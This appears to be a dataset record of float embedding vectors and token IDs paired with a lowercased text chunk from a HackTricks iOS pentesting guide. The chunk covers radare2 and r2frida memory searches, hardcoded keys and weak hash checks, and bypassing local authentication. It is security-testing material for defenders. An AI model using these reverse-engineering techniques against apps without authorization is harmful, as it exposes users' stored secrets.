0.755048930644989, -0.3337303400039673, 0.3801441490650177, 0.15557602047920227, 0.06690344959497452, 0.6936572194099426, 0.32077404856681824, -0.07073812186717987, -0.5539866089820862, -0.07299421727657318, 0.3489260971546173, -0.7079843282699585, 0.6837756037712097, -0.7209463715553284, 0.41832399368286133, -0.20221567153930664, 0.2015945017337799, 0.10501652956008911, 0.19266550242900848, 0.058541588485240936, 0.08218465000391006, 0.6244410276412964, -0.9076310992240906, -0.05726991221308708, 0.07389798015356064, 0.6015998125076294, 0.53774493932724, 0.005788513924926519, -0.42868977785110474, 0.06627209484577179, -0.08338724076747894, -1.5200529098510742, 0.6470358371734619, -0.3002064824104309, 0.428177148103714, 0.05480758473277092, -0.2982657551765442, 0.375916987657547, -0.6263307929039001, 0.1911146640777588, 0.6905368566513062, 0.40916067361831665, -0.09646192938089371, -0.24613116681575775, -0.15882612764835358, 0.12050773203372955, -0.21294862031936646, 0.2600753605365753, 0.016821909695863724, -0.0607377327978611, -0.28399330377578735, -0.1270885169506073, -0.17104913294315338, -0.6065040230751038, 0.08085015416145325, 0.6239379048347473, 0.28766506910324097, 0.6862437725067139, -0.3762154281139374, -0.451018363237381, -0.32659009099006653, -0.17659960687160492, -0.25762584805488586, 0.24339865148067474, 0.5754449963569641, 0.7438098192214966, -0.003163402434438467, -0.5153457522392273, 0.13816042244434357, -0.5603675842285156, 0.041778769344091415, 0.6033120155334473, 0.029093388468027115, -0.9942503571510315, 0.08953490853309631, 0.48079735040664673, -0.9226215481758118, -0.2887301445007324, -0.44725266098976135, 0.026686664670705795, 0.7096489071846008, -0.427606463432312, 0.16387015581130981, -0.20312631130218506, -0.5400213003158569, -0.1622556447982788, 0.7519044280052185, 0.2821395993232727, -0.042526066303253174, -0.02311066724359989, 0.2767239809036255, 0.16723895072937012, -0.42783379554748535, 0.7432813048362732, -0.6681817173957825, -0.14757372438907623, -1.0008840560913086, -0.09146521985530853, -0.0685531422495842, 0.027488041669130325, 0.8099671006202698, -0.7359272837638855, 0.10813136398792267, 0.006636099424213171, 0.020598014816641808, 0.5929090976715088, 0.1565369814634323, 0.49231773614883423, 1.041300892829895, -0.32498839497566223, -0.7954652309417725, -0.1293545365333557, 0.17770951986312866, 0.09015701711177826, 0.308107852935791, -0.5072816610336304, -0.02113148756325245, -0.1467643678188324, 0.2054365575313568, -0.41143539547920227, -0.8787525296211243, -0.9881821870803833, -1.0806273221969604, 0.03334859386086464, 0.11818040907382965, -0.8447048664093018, 0.062130652368068695, 0.5636079907417297, -0.01399534847587347, -0.31750422716140747, -0.33718425035476685, 0.7503710389137268, -0.35272300243377686, 0.10032310336828232, -0.5375121235847473, 0.37187254428863525, -0.6852630972862244, 0.0990852415561676, -0.30384036898612976, -0.5486154556274414, -0.2936839759349823, -0.41163620352745056, -0.40755414962768555, 0.17806676030158997, -0.6640099287033081, 0.3359189033508301, -0.715523898601532, 0.21339066326618195, -0.25274503231048584, 0.1581876277923584, 0.30049702525138855, 0.5128727555274963, -0.6312810182571411, 0.6753172278404236, -0.03949880599975586, -0.008561009541153908, 0.20893491804599762, -0.644188404083252, 0.14783845841884613, -0.5800301432609558, 0.7901212573051453, 0.14180955290794373, 0.2068423628807068, -0.46013638377189636, 0.30886563658714294, -0.4734337329864502, -0.2353600710630417, -0.4105859100818634, -0.8474893569946289, 0.11271937936544418, 0.7408005595207214, -0.6333037614822388, 0.07278425246477127, 0.9293748736381531, -0.13151273131370544, 0.4624093770980835, -0.4891449511051178, 0.0999738797545433, 0.10361886769533157, 0.20597834885120392, 0.18985652923583984, 0.15745358169078827, 0.05085831508040428, -0.000678952201269567, 0.4345472753047943, 0.09308004379272461, -0.4874281585216522, 0.016914980486035347, -0.2848148047924042, -0.0739239752292633, -0.09538774192333221, 0.1870468705892563, 0.40801748633384705, 0.4061063528060913, 0.20109878480434418, -0.04717420041561127, -0.0011190127115696669, -0.14107444882392883, -0.4519118666648865, -0.16750884056091309, -0.8914927244186401, -0.4987312853336334, 0.049238964915275574, -0.4282282292842865, -0.1037389412522316, 0.027607837691903114, 0.2900557219982147, -0.08803980052471161, 0.10748924314975739, -0.07334758341312408, 0.468930184841156, 0.19005727767944336, -0.11027706414461136, 0.6390115022659302, -0.12393762916326523, -0.3420540392398834, -0.40924617648124695, 0.07753808796405792, -0.5919262170791626, -0.7437146902084351, 0.0951133742928505, 0.4936322569847107, 0.35221466422080994, -0.17836882174015045, -0.34633415937423706, -0.34296858310699463, 0.29627928137779236, 0.23413777351379395, 0.13598041236400604, -0.11743365973234177, -0.5256780982017517, 1.066411018371582, -0.4954918622970581, 0.14874890446662903, 0.2263256013393402, -0.00984732061624527, 0.3919123411178589, -0.33960601687431335, -0.4023377001285553, 0.45857033133506775, 0.3251799941062927, 0.0025422130711376667, 1.1874414682388306, 0.3407369554042816, 0.32915905117988586, -0.2896343469619751, 0.10850358009338379, 0.3425225615501404, 0.5795046091079712, 0.696580171585083, 0.29951712489128113, -0.5225344896316528, 0.12465918809175491, 0.45466694235801697, -0.6397348046302795, -0.2065727710723877, 0.32156428694725037, 0.10113242268562317, -0.4190767705440521, -0.029861511662602425, 0.027890533208847046, -0.19074663519859314, 0.19339920580387115, -0.3361692726612091, 0.4704737961292267, -0.16563867032527924, -0.215782031416893, -0.38166695833206177, -0.40827617049217224, 0.591675341129303, -0.40129193663597107, 0.31991899013519287, 0.1938556730747223, 0.352243572473526, -0.11258592456579208, -0.3989604115486145, -0.9308546185493469, 0.049621935933828354, 0.9823710322380066, 0.25926482677459717, -0.34874916076660156, 0.5443909168243408, 0.14277701079845428, 0.2611268162727356, 0.35468974709510803, -0.2882816195487976, -0.49386724829673767, 0.20375484228134155, -0.10609054565429688, -0.8033570647239685, -0.5989270210266113, 0.6589988470077515, 0.32750892639160156, 0.1326068937778473, 0.29603591561317444, -0.17783144116401672, 0.4024337828159332, -0.7740675210952759, 0.09328526258468628, -0.9868890047073364, 0.29829221963882446, 0.4837796986103058, 0.09898238629102707, -0.9751994013786316, 0.6445716023445129, -0.316463828086853, 0.3428964614868164, 0.02869022823870182, 0.4466763138771057, 0.11060476303100586, 0.7540364861488342, 0.5382614731788635, -0.3001088500022888, -0.3360710144042969, -0.13794627785682678, -0.28471240401268005, -0.2745271325111389, 0.010882342234253883, -0.1958916038274765, 0.49485957622528076, -0.01539679802954197, -0.2695665955543518, -0.45641404390335083, 0.060851261019706726, -0.08162283897399902, -0.367857962846756, 0.9651537537574768, 0.19026349484920502, -0.614463746547699, -0.1954827755689621, -0.07525143027305603, 0.02811443991959095, 0.4744420051574707, -0.6318590641021729, 0.01617453806102276, 0.028792554512619972, -0.046216025948524475, -0.31397154927253723, 1.4139291048049927, -0.3597119450569153, -0.5292225480079651, -0.015643412247300148, -0.3273555636405945, -0.6467695236206055, -0.32439494132995605, -0.5673824548721313, -0.7733330130577087, 0.7608510851860046, 0.3856063485145569, 0.9786303639411926, 0.12575598061084747, -0.7502611875534058, -0.05419567972421646, 0.6888076663017273, 0.34761714935302734, -0.3947351276874542, 0.6554661393165588, 0.7782767415046692, 0.14355319738388062, 0.49022433161735535, 0.06769934296607971, -0.03449040278792381, -0.12783439457416534, 0.1040707379579544, -0.20631246268749237, -0.28525403141975403, -0.6819301843643188, -0.44552120566368103, 0.22202380001544952, 0.15655912458896637, -0.5347806811332703, 0.12073202431201935, -0.6477074027061462, -0.10981132835149765, -0.7059457302093506, 0.3792957067489624, 0.21719180047512054, 0.41108521819114685, -0.2530193030834198, -0.0742063820362091, 1.0607033967971802, -1.235479474067688, 4.639500141143799, 0.6385282278060913, -0.046308696269989014, 0.2733435332775116, -0.23098386824131012, 0.6245384812355042, 1.1436525583267212, -1.0025980472564697, -0.07800259441137314, -0.07896997034549713, 0.06275905668735504, -0.03890509530901909, 0.2737385034561157, -0.029285503551363945, 0.5868022441864014, 0.562360405921936, -0.16436626017093658, 0.4515726864337921, 0.33119046688079834, -0.6305554509162903, -0.5956754088401794, 0.09272600710391998, -0.3761099874973297, 0.417479932308197, 0.5993740558624268, 0.12077360600233078, 0.16012689471244812, -0.6800627708435059, -0.43512868881225586, 0.23450076580047607, -0.08214668184518814, -0.3201148808002472, 0.3285948634147644, -0.0820399597287178, -0.3239082992076874, 0.1264922171831131, 0.6517740488052368, -0.7149184942245483, -0.2582552134990692, -0.3038446009159088, -0.13102400302886963, -0.09409814327955246, 0.10121776908636093, -0.23075585067272186, 0.08667000383138657, 0.8122414946556091, -0.2579152286052704, 0.822530210018158, 0.2251436859369278, -1.0331352949142456, 0.5363116264343262, 0.14685477316379547, 0.16184552013874054, -0.022487295791506767, -0.6205282211303711, 0.539395272731781, 0.18621514737606049, -0.36610516905784607, 0.00040792569052428007, -0.4052991569042206, 0.6532127857208252, -0.41446375846862793, -0.03726097196340561, 0.27332374453544617, -0.4462698996067047, 0.24912171065807343, -0.29552212357521057, 0.3290182054042816, -0.3101767301559448, -0.21453025937080383, -0.2745610177516937, -0.6697070598602295, -0.5871143937110901, -0.5802651643753052, 0.9861297607421875, -0.1560332179069519, -0.3429364264011383, 0.20330502092838287, -0.367358535528183, -0.5769291520118713, 0.0038806505035609007, -0.6955703496932983, -0.6185367703437805, 0.3896061182022095, 0.6843370795249939, 0.1127699539065361, -0.038666076958179474, -0.7094606161117554, -0.048384685069322586, -0.05196986347436905, 0.477044939994812, 0.29158949851989746, -0.27137142419815063, -0.06765379756689072, 0.7383997440338135 ]
[ 1005, 1055, 3638, 1010, 2034, 3443, 1037, 3638, 15653, 1012, 14084, 1010, 2017, 2064, 17908, 1996, 3638, 1999, 2613, 2051, 2007, 1010, 2005, 2742, 1010, 1037, 2139, 8569, 13327, 1012, 7539, 1997, 1996, 4118, 2017, 2224, 1010, 2023, 2003, 1037, 2200, 7561, 1011, 13047, 2832, 2138, 15653, 2015, 3073, 1996, 2951, 2187, 2011, 6472, 4972, 1998, 2017, 2453, 3335, 23448, 4187, 4084, 1012, 1999, 2804, 1010, 12549, 2951, 2076, 4106, 2003, 3243, 3733, 2000, 2079, 4983, 2017, 2113, 1996, 24319, 1997, 1996, 2951, 2017, 1005, 2128, 2559, 2005, 1006, 2593, 2049, 6635, 3643, 2030, 2049, 4289, 1007, 1012, 2005, 2742, 1010, 2065, 1996, 10439, 4372, 26775, 22571, 3215, 2429, 2000, 1037, 18154, 7013, 19490, 3145, 1010, 2017, 1005, 2128, 2200, 9832, 2000, 3962, 1996, 3145, 1999, 3638, 4983, 2017, 2424, 2049, 3643, 2011, 2060, 2965, 1012, 2128, 18886, 23559, 1998, 20253, 1037, 3638, 15653, 8545, 12399, 2017, 2024, 2478, 1037, 7173, 29162, 2030, 1037, 2512, 1011, 7173, 29162, 5080, 1010, 2017, 2064, 15653, 1996, 10439, 1005, 1055, 2832, 3638, 2007, 22224, 1998, 10424, 3593, 24237, 1012, 2044, 1996, 3638, 2038, 2042, 14019, 1006, 1041, 1012, 1043, 1012, 2000, 1037, 5371, 2170, 1000, 3638, 1000, 1007, 1010, 5834, 2006, 1996, 3267, 1997, 1996, 2951, 2017, 1005, 2128, 2559, 2005, 1010, 2017, 1005, 2222, 2342, 1037, 2275, 1997, 2367, 5906, 2000, 2832, 1998, 17908, 2008, 3638, 15653, 1012, 2005, 6013, 1010, 2065, 2017, 1005, 2128, 7995, 2006, 7817, 1010, 2009, 2453, 2022, 7182, 2005, 2017, 2000, 15389, 1996, 3094, 7817, 2030, 10958, 8428, 2475, 1011, 1062, 2480, 2000, 14817, 2216, 7817, 1012, 1001, 2478, 7817, 1002, 7817, 3638, 1028, 7817, 1012, 19067, 2102, 1001, 2478, 10958, 8428, 2475, 1002, 10958, 8428, 2475, 1011, 1062, 2480, 3638, 1028, 7817, 1012, 19067, 14399, 2368, 7817, 1012, 19067, 2102, 1999, 2115, 5440, 3559, 1998, 10667, 2083, 2009, 2000, 6709, 7591, 2592, 1012, 2174, 2065, 2017, 1005, 1040, 2066, 2000, 22459, 2060, 2785, 1997, 2951, 1010, 2017, 1005, 1040, 2738, 2215, 2000, 2224, 7217, 2063, 2475, 1998, 2049, 3945, 9859, 1012, 2156, 7217, 2063, 2475, 1005, 1055, 2393, 2006, 1996, 3945, 3094, 1006, 1013, 1029, 1007, 2005, 2062, 2592, 1998, 1037, 2862, 1997, 7047, 1012, 1996, 2206, 3065, 2069, 1037, 16745, 1997, 2068, 1024, 1002, 1054, 2475, 1026, 2171, 1035, 1997, 1035, 2115, 1035, 15653, 1035, 5371, 1028, 1031, 1014, 2595, 8889, 8889, 8889, 8889, 1033, 1028, 1013, 1029, 8192, 1024, 1013, 1031, 999, 28939, 1033, 1031, 12098, 2290, 1033, 3945, 4933, 1006, 2156, 1005, 1041, 1029, 1029, 3945, 1005, 2005, 7047, 1007, 1064, 2224, 22834, 1012, 12436, 2005, 6575, 1999, 2512, 7484, 12786, 7258, 1064, 1013, 29379, 1032, 1060, 8889, 3945, 2005, 5164, 1005, 29379, 1032, 1014, 1005, 1064, 1013, 1039, 1031, 12098, 1033, 3945, 2005, 19888, 2080, 4475, 1064, 1013, 1041, 1013, 1041, 1012, 1042, 1013, 1045, 2674, 3180, 3670, 1064, 1013, 1045, 29379, 3945, 2005, 5164, 1005, 29379, 1005, 9217, 2553, 1064, 1013, 1049, 1031, 1029, 1033, 1031, 1041, 25526, 1033, 3894, 8873, 2571, 3945, 2005, 3894, 1010, 6764, 27268, 6633, 2015, 2030, 12441, 20346, 2015, 1064, 1013, 1058, 1031, 13412, 2620, 1033, 3643, 2298 ]
hack_tricks
43.txt
18
for an ` cfg. bigendian ` 32bit value | / w foo search for wide string'f \ 0o \ 0o \ 0'| / x ff0033 search for hex string | / z min max search for strings of given size... runtime memory analysisby using r2frida you can analyze and inspect the app's memory while running and without needing to dump it. for example, you may run the previous search commands from r2frida and search the memory for a string, hexadecimal values, etc. when doing so, remember to prepend the search command ( and any other r2frida specific commands ) with a backslash \ after starting the session with r2 frida : / / usb / / < name _ of _ your _ app >. broken cryptographypoor key management processessome developers save sensitive data in the local storage and encrypt it with a key hardcoded / predictable in the code. this shouldn't be done as some reversing could allow attackers to extract the confidential information. use of insecure and / or deprecated algorithmsdevelopers shouldn't use deprecated algorithms to perform authorisation checks, store or send data. some of these algorithms are : rc4, md4, md5, sha1... if hashes are used to store passwords for example, hashes brute - force resistant should be used with salt. checkthe main checks to perform if to find if you can find hardcoded passwords / secrets in the code, or if those are predictable, and if the code is using some king of weak cryptography algorithms. it's interesting to know that you can monitor some crypto libraries automatically using objection with : ios monitor cryptfor more information about ios cryptographic apis and libraries access url authenticationthe tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. attackers can easily bypass local authentication if no data returns from the authentication process. the local authentication framework provides a set of apis for developers to extend an authentication dialog to a user. in the context of connecting to a remote service, it is possible ( and recommended ) to leverage the keychain for implementing local authentication. the fingerprint id sensor is operated by the secureenclave security coprocessor and does not expose fingerprint data to any other parts of the system. next to touch id, apple
[ 0.258719801902771, -0.2647300064563751, 0.1272212713956833, 0.1674337387084961, -0.6678427457809448, -0.11114656925201416, 0.1891525387763977, 0.2527675926685333, 0.21980059146881104, 0.9253139495849609, -0.05629224330186844, 0.4900924861431122, -0.06408783793449402, -0.4622897803783417, -0.18615193665027618, -0.018109437078237534, -0.40372681617736816, -0.4378871023654938, -0.743694007396698, 0.0742650255560875, 0.4793563187122345, -0.08462546765804291, -0.9808405041694641, -0.6023567914962769, -0.35750812292099, 0.7321439981460571, 0.537521243095398, 0.36391741037368774, 0.20250335335731506, 0.6573311686515808, 0.18922652304172516, -0.08413761854171753, 0.18033616244792938, -0.3774496018886566, -0.4108070135116577, -0.2703430950641632, 0.468760222196579, -0.506090521812439, 0.0403180755674839, -0.603887677192688, 0.4139381945133209, -0.24966157972812653, -0.046095672994852066, -0.4358300566673279, -0.638866662979126, -0.7946226596832275, -0.12757885456085205, -0.2388341724872589, 0.6049628257751465, -0.35472962260246277, 0.029302366077899933, 0.09015154093503952, -0.28648778796195984, 0.003982950001955032, 0.5496950149536133, 0.7053356170654297, -0.05736272409558296, -0.021642832085490227, -0.20634086430072784, 0.39171990752220154, 0.794949471950531, 0.479037344455719, 0.3610011339187622, -0.8036314845085144, 0.43328621983528137, 0.20546963810920715, 0.15858156979084015, -0.013240883126854897, 0.1853533685207367, -0.49846065044403076, -0.31652945280075073, 0.19290286302566528, -0.33685576915740967, -0.7296226024627686, -0.22279366850852966, 0.050903577357530594, 0.42930006980895996, -0.5749756097793579, -0.34579288959503174, 0.6929300427436829, -0.2331078201532364, 0.5976520776748657, 0.2670806646347046, -0.21752774715423584, -0.33520206809043884, -0.35789984464645386, 0.128846675157547, 0.4167538583278656, -0.6054292321205139, -0.2520020008087158, 0.7953412532806396, 0.3495302200317383, -0.4703753590583801, 0.03851905092597008, 0.5161198973655701, 0.8655577898025513, -0.42707687616348267, -0.18628914654254913, 0.3422057628631592, -0.368637353181839, 0.15272410213947296, 0.3312637209892273, 0.30844759941101074, 0.4302266240119934, -0.3436306416988373, 0.14489218592643738, 0.2854190170764923, -0.043017853051424026, -0.12034453451633453, -0.3191490173339844, 0.7079252004623413, -0.34802791476249695, 0.49800732731819153, -0.29797738790512085, -0.3648701310157776, 0.6258184909820557, 0.5363041758537292, 0.0679195374250412, 0.0009115402936004102, 0.5642070770263672, 0.4061925411224365, 0.08798222988843918, 0.6734061241149902, -0.340876042842865, 0.4279934763908386, -0.01163381990045309, 0.3365630805492401, 0.21186120808124542, -0.9535333514213562, -0.47478362917900085, -0.4492915868759155, -0.2989460229873657, -0.024120602756738663, 0.23072990775108337, -0.6496945023536682, -0.2137293815612793, 0.2480989545583725, 0.2749479413032532, 0.4056275188922882, -0.39539217948913574, 0.2897486090660095, 0.48916393518447876, 0.34132277965545654, 1.2000763416290283, 0.30684828758239746, -0.024477647617459297, -0.15941256284713745, -0.09942319989204407, -0.4368295669555664, 0.07466746121644974, 0.04446607828140259, -0.1569986790418625, 0.6670442819595337, 0.006206052377820015, -0.15495474636554718, -0.22714801132678986, -0.6206463575363159, 0.37461936473846436, -0.23838546872138977, -0.10644209384918213, -0.24436452984809875, 1.3518109321594238, -0.20981934666633606, 0.5749993920326233, -0.37972724437713623, 0.1682085543870926, -0.42250335216522217, -0.1391906440258026, 0.08227482438087463, 0.026168519631028175, 0.16411316394805908, -0.07130984216928482, 0.35834646224975586, -0.09433044493198395, 1.1079716682434082, 0.673629879951477, 0.2899887263774872, 0.1049395203590393, 0.39776280522346497, 0.789569616317749, -0.2714456617832184, -0.19949409365653992, 0.4018974304199219, 0.6035378575325012, -0.014594092965126038, -0.12518274784088135, -0.3400382101535797, -0.8927580118179321, -0.0920477882027626, -0.40518802404403687, -0.0797489732503891, 0.591894805431366, -1.007417917251587, 0.1907350718975067, 0.6589035987854004, 0.10674383491277695, -1.2416515350341797, -0.16902528703212738, -0.6429944038391113, -1.6180421113967896, -0.48275265097618103, 0.04134293273091316, -0.18286849558353424, 0.44438719749450684, -0.41687333583831787, 0.0935187041759491, 0.7188018560409546, 0.5831179618835449, -0.2547573447227478, 0.683553159236908, 0.7302497029304504, -0.45045945048332214, -0.7034276127815247, 0.11426810175180435, 0.2906673550605774, 0.33224156498908997, -0.46139538288116455, 0.2488797903060913, 0.5659741759300232, 0.3864755928516388, -0.04723013564944267, 0.6291653513908386, 0.6547763347625732, 0.5303493738174438, -0.03142613172531128, -0.22227241098880768, -0.18045079708099365, 0.2524473965167999, -0.0696163922548294, -0.17436745762825012, -0.45028162002563477, 0.6920437812805176, 0.255905419588089, 0.7317606210708618, -0.10734187811613083, -0.17313149571418762, -0.006528580095618963, 0.23039273917675018, 0.008449305780231953, 0.06527304649353027, -0.2667139768600464, 0.8865494728088379, 0.5428696274757385, 0.8938006162643433, 0.5971484780311584, -0.006466675084084272, 0.10456054657697678, 0.06379595398902893, 0.3394344449043274, 0.24838073551654816, 0.1411702185869217, 0.5367407202720642, 0.5795825123786926, -0.4355354607105255, -0.7855349779129028, -0.35105302929878235, 0.6213792562484741, 1.1021133661270142, -0.23908215761184692, -0.6351732015609741, 0.012807149440050125, 0.027911223471164703, -0.09724634885787964, -0.22360564768314362, -0.03114202991127968, 0.5539426207542419, 0.2221546471118927, 0.57530277967453, -0.2833617031574249, -0.4521930515766144, -1.1112154722213745, -0.18201708793640137, -0.8267202377319336, -0.4713664650917053, -0.6921835541725159, 0.4873630702495575, 0.7170776724815369, -0.37447670102119446, 0.24091415107250214, -0.37063488364219666, -0.7084485292434692, -0.29471659660339355, 0.21425379812717438, 0.7132847309112549, 0.016558172181248665, 0.09434659779071808, -1.0298116207122803, 0.2769501209259033, 0.07135550677776337, 0.45400911569595337, -0.2153467983007431, -0.07016651332378387, -0.3303740620613098, -0.18231432139873505, 0.09879166632890701, -0.6176317930221558, 0.5914682745933533, -0.014570814557373524, -0.5877342820167542, -0.03319985046982765, 0.6856306195259094, 0.12847404181957245, 0.8523620963096619, 0.18726782500743866, -0.44574764370918274, 0.7458540201187134, -0.022310571745038033, -0.012501496821641922, 0.4372183382511139, 0.3997969329357147, -0.43940210342407227, 0.23562060296535492, 0.03270005062222481, 0.8275120258331299, -0.7099502682685852, 0.5009623765945435, 0.4301892817020416, 0.018749704584479332, -0.28817445039749146, -0.1819867193698883, 0.06542894244194031, -0.32308635115623474, -0.04874184727668762, -0.12958361208438873, -0.48508039116859436, 0.38977473974227905, 0.1770225167274475, -1.1938141584396362, 0.39188554883003235, -0.650967538356781, -0.6830523014068604, 0.003227179404348135, -0.3148741126060486, 0.9348264336585999, 0.27018359303474426, 0.3858972191810608, -0.26898783445358276, -0.03553163632750511, 0.1343228816986084, 0.16475996375083923, 0.31681814789772034, -0.981531023979187, 0.5076392292976379, 0.5181897878646851, 0.07393720746040344, 0.5689807534217834, -0.28005239367485046, -0.112882599234581, -0.3943846821784973, 0.038054510951042175, -0.002365474821999669, -0.07009916007518768, 0.29683244228363037, 0.6330214142799377, 0.5716271996498108, 0.4493274986743927, -0.16155239939689636, 0.05413753539323807, 0.4810533821582794, 0.22003428637981415, 0.48961183428764343, 0.16539230942726135, 0.3733009099960327, 0.18127740919589996, -0.33651813864707947, -0.7220154404640198, -0.1693948358297348, 0.35064202547073364, 0.3090221583843231, 0.10865099728107452, 0.7315226793289185, -0.22299887239933014, -0.01009585615247488, 0.5567500591278076, -0.18654797971248627, -0.49259668588638306, 0.6273886561393738, 0.01595979556441307, 0.9418859481811523, -0.3544182777404785, 0.8235175013542175, -0.3966539204120636, -0.09080550819635391, 0.08597221225500107, 0.4582136273384094, -0.4216565787792206, -0.48519736528396606, -0.6389118432998657, -0.45424842834472656, -0.5645804405212402, -0.14426545798778534, 0.18630653619766235, 0.10098229348659515, -0.7510470747947693, -0.9065580368041992, -0.5019013285636902, 0.4541415572166443, 0.6420924663543701, 0.8776221871376038, 0.6015787124633789, 0.33265939354896545, -0.15742790699005127, -0.18207696080207825, 0.37188005447387695, -0.7935047149658203, 0.32390907406806946, -0.5555110573768616, 0.9299628138542175, -0.6089141368865967, -0.01944207213819027, -0.5407879948616028, 0.22023910284042358, -0.3761197030544281, -0.07211015373468399, 0.0732719898223877, -0.24064761400222778, -0.3713507354259491, -0.28728145360946655, -0.07137198001146317, -0.043556708842515945, -1.0053033828735352, 0.18390461802482605, 0.0810418501496315, 0.6113574504852295, 1.0547876358032227, -0.7814886569976807, 0.008400349877774715, -0.45796939730644226, 0.45881903171539307, 0.27198827266693115, 0.0010695611126720905, -0.1376475691795349, -0.6063688397407532, -0.6962459683418274, -0.4809189438819885, -0.2362070530653, 0.06302158534526825, 0.25192123651504517, -0.09331278502941132, -0.5834977030754089, -0.5475468635559082, 0.5422824025154114, -0.01751593127846718, -0.7688403725624084, 0.06370310485363007, 0.39523324370384216, 0.555371105670929, 0.344865620136261, -0.18947955965995789, -0.2524501085281372, 0.4276985824108124, -0.7504127621650696, 0.5405865907669067, -0.5650638341903687, -0.1731821745634079, 0.34247106313705444, 0.235881969332695, 0.05519169941544533, 0.7295060753822327, -0.5278715491294861, -0.030168628320097923, -0.535400390625, -0.2441127598285675, -0.1875801682472229, -0.20629845559597015, 0.5662821531295776, -0.12231209874153137, -0.24738240242004395, 0.5063111186027527, 0.03215838596224785, -0.17235146462917328, 0.505446195602417, 0.0299852155148983, -0.5911871790885925, 0.5006871819496155, -0.7566339373588562, 0.7616537809371948, -0.13181883096694946, -0.16557945311069489, -0.32711026072502136, -0.28283384442329407, 0.8949339985847473, -0.1415940821170807, 0.6766595244407654, -1.146840214729309, -0.38198593258857727, -0.33821791410446167, -0.04658128693699837, -0.05868621915578842, 0.9579132795333862, -0.1501041203737259, -0.05694008991122246, -0.3860728144645691, 0.3488481640815735, -0.393197625875473, -0.38068053126335144, -0.499726265668869, -0.26512619853019714, -0.07200926542282104, -0.14352214336395264, 0.5948787331581116, -0.25131526589393616, -0.7390896677970886, 0.41466566920280457, -0.03309628367424011, 0.08116326481103897, -1.2484102249145508, -0.08235322684049606, -0.3956897556781769, 0.6055414080619812, -0.16087263822555542, 0.5899996161460876, -0.26211777329444885, -0.22707371413707733, -0.14636996388435364, 0.17306667566299438, 0.23122742772102356, -0.31319716572761536, -0.37109893560409546, 0.6331849098205566, 0.4470635950565338, -0.6176503896713257, -0.05347594991326332, 0.5286148190498352, 0.07429592311382294, 0.3697426915168762, -0.6151809096336365, -0.09769169241189957, -0.5836880207061768, -0.04714231565594673, -0.1331896036863327, 0.09188839793205261, 0.5547698140144348, -0.66957688331604, -0.6217706799507141, -0.4247523546218872, 0.3949821889400482, 0.36166009306907654, -0.8038617968559265, -0.26083633303642273, -0.31573227047920227, -0.09404134005308151, -0.048706475645303726, -0.03805632144212723, -0.7665749192237854, -0.4126443862915039, -0.07749950885772705, 0.7597667574882507, -0.30537572503089905, 0.2769172787666321, -0.23110809922218323, 0.2538014352321625, 0.3442758321762085, 0.09844229370355606, -0.42602813243865967, -0.9883441925048828, 0.28382056951522827, 0.08544743061065674, -0.19747866690158844, 0.5153058767318726, -0.5206839442253113, 0.1374080330133438, -0.11762037873268127, 0.6429184675216675, 0.13855698704719543, -0.5620577335357666, -0.08281884342432022, 0.44511526823043823, 0.9500401616096497, -0.7962387204170227, 0.11579963564872742, 0.18331320583820343, 0.2541694641113281, 0.21567244827747345, -0.21021506190299988, -0.4595116972923279, 0.26091551780700684, -0.5895572900772095, -1.4088869094848633, 0.6210442185401917, -0.2790883183479309, 0.2531639039516449, -0.43739238381385803, 0.10242124646902084, 0.34012874960899353, -0.13944987952709198, 0.26449695229530334, 0.4971259832382202, 0.2871858477592468, -0.047653213143348694, -0.5852243900299072, 0.7365567684173584, 0.4596478044986725, 0.10587499290704727, 0.00836644135415554, -0.34767359495162964, -0.01688261143863201, 0.1782674789428711, -0.3573854863643646, -0.10976435989141464, -0.5487374663352966, -0.3656434416770935, 0.225907102227211, -0.2430911362171173, 0.2665413022041321, -0.3772452473640442, -0.9830818176269531, -0.14502860605716705, -0.12106508761644363, -0.34982332587242126, -0.2130906879901886, 0.39385882019996643, 0.7588202357292175, -0.012003418058156967, -0.8359072208404541, 0.37717896699905396, -0.43691515922546387, -0.17219889163970947, 0.44824326038360596, -0.2680566608905792, -0.3993224799633026, 0.884369432926178, 0.4811662435531616, -0.8705472946166992, -0.555161714553833, -0.4850301742553711, -0.12715846300125122, 0.27699804306030273, -0.5743451118469238, 0.11759112030267715, -0.21461041271686554, -0.1070328876376152, -0.26152142882347107, 0.22642384469509125, 0.1392463594675064, 0.5087175369262695, -0.56625896692276, 0.4051376283168793, -0.2714983820915222, -0.4162145256996155, 0.5086163878440857, -0.8111583590507507, -0.3398398756980896, -0.48875924944877625, 0.15276497602462769, 0.22490715980529785, -0.18362583220005035, 1.1497045755386353, -0.4629247486591339, 0.32241401076316833, -0.1476142257452011, -0.20347613096237183, 0.5568584203720093, 0.058451976627111435, 0.048032741993665695, 0.8339405059814453, 0.3788403272628784, -0.5013436675071716, -0.45716342329978943, 0.7183725833892822, 0.2590900957584381, 0.5509630441665649, -0.423613041639328, 0.2878597378730774, -0.06439633667469025, 0.18146991729736328, -0.594673216342926, -0.7600607872009277, -0.8418292999267578, -0.7781305313110352, -0.36725589632987976, -0.06128764525055885, -0.7776914238929749, -0.5494123697280884, -0.024103300645947456, -0.10932210832834244, 0.08365269005298615, -0.3505092263221741, 0.2205575555562973, -0.8554527163505554, -0.13246756792068481, -0.5255531072616577, 0.0207068994641304, -0.8747063279151917, -0.9348434209823608, -0.38503512740135193, -0.7021551728248596, -0.4355277121067047, -0.12945905327796936, -0.1872875839471817, -0.1068497896194458, -0.44560864567756653, 0.018095290288329124, -0.8328036069869995, -0.03437960520386696, -0.0832599550485611, -0.11080282181501389, 0.0865648090839386, 0.528314471244812, -0.3371916711330414, 0.22718800604343414, 0.21750931441783905, 0.39059218764305115, 0.3553372323513031, -0.3148457705974579, 0.5893222689628601, -0.551469087600708, 0.05007093399763107, 0.27472323179244995, -0.17091910541057587, -0.30633142590522766, 0.34915217757225037, -0.26528653502464294, -0.20436620712280273, -0.1680046170949936, -0.2737140953540802, -0.2090119868516922, 0.34525811672210693, -0.20990990102291107, 0.292084276676178, 1.091168999671936, 0.014315605163574219, 0.34309014678001404, -0.47923755645751953, 0.3937925696372986, 0.2695578336715698, -0.32244357466697693, 0.14199644327163696, 0.44744017720222473, 0.7777078151702881, -0.4264669418334961, 0.024655114859342575, -0.1202811449766159, -0.933064877986908, 0.10648053884506226, -0.45423251390457153, 0.1718159019947052, -0.13883383572101593, -0.3818497061729431, 0.28405648469924927, -0.2254718840122223, 0.20310410857200623, -0.10562953352928162, 0.08734975010156631, 0.40077733993530273, -0.8282606601715088, 0.29513370990753174, -1.0854820013046265, -0.20927666127681732, 0.08414708822965622, -0.13879670202732086, 